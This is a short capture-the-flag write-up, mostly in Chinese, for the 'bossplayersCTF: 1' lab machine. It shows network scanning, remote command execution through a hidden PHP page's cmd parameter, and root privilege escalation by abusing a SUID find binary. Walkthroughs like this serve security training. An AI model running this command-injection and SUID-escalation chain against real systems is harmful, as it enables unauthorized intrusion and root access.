bossplayersCTF: 1

Description
Aimed at Beginner Security Professionals who want to get their feet wet into doing some CTF’s. It should take around 30 minutes to root.

Write-UP

虚拟机配置如下:

扫vmnet1:
hausa@debian:~/visualmachine$fping -asg 172.16.1.1/24
172.16.1.1
172.16.1.130

扫172.16.1.130:
hausa@debian:~/visualmachine$ nmap -A -p 1-65535 172.16.1.130
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-15 00:38 EDT
Nmap scan report for 172.16.1.130
Host is up (0.000057s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 ac:0d:1e:71:40:ef:6e:65:91:95:8d:1c:13:13:8e:3e (RSA)
| 256 24:9e:27:18:df:a4:78:3b:0d:11:8a:92:72:bd:05:8d (ECDSA)
|_ 256 26:32:8d:73:89:05:29:43:8e:a1:13:ba:4f:83:53:f8 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn’t have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.37 seconds

开了22/ssh和80/http
访问80。
f12在最下面有一排注释。WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK
多层base64解码后是:
workinginprogress.php
尝试访问。
有:Test ping command – [ ]
尝试RCE。
172.16.1.130/workinginprogress.php?cmd=ls
index.html logs.php robots.txt workinginprogress.php
确实有。
172.16.1.130/workinginprogress.php?cmd=whoami
www-data
172.16.1.130/workinginprogress.php?cmd=find /bin /sbin /usr/bin /usr/sbin -perm -4000
/usr/bin/mount /usr/bin/umount /usr/bin/gpasswd /usr/bin/su /usr/bin/chsh /usr/bin/grep /usr/bin/chfn /usr/bin/passwd /usr/bin/find /usr/bin/newgrp
有find。接下来跟DC-1一样了。
172.16.1.130/workinginprogress.php?cmd=find robots.txt -exec whoami \;
root
172.16.1.130/workinginprogress.php?cmd=find robots.txt -exec ls /root \;
root.txt
172.16.1.130/workinginprogress.php?cmd=find robots.txt -exec cat /root/root.txt \;
Y29uZ3JhdHVsYXRpb25zCg==
最后解码:congratulations

总结

看了看其他人的思路,他们都弹shell了。
我还不是很会,这方面需要学学。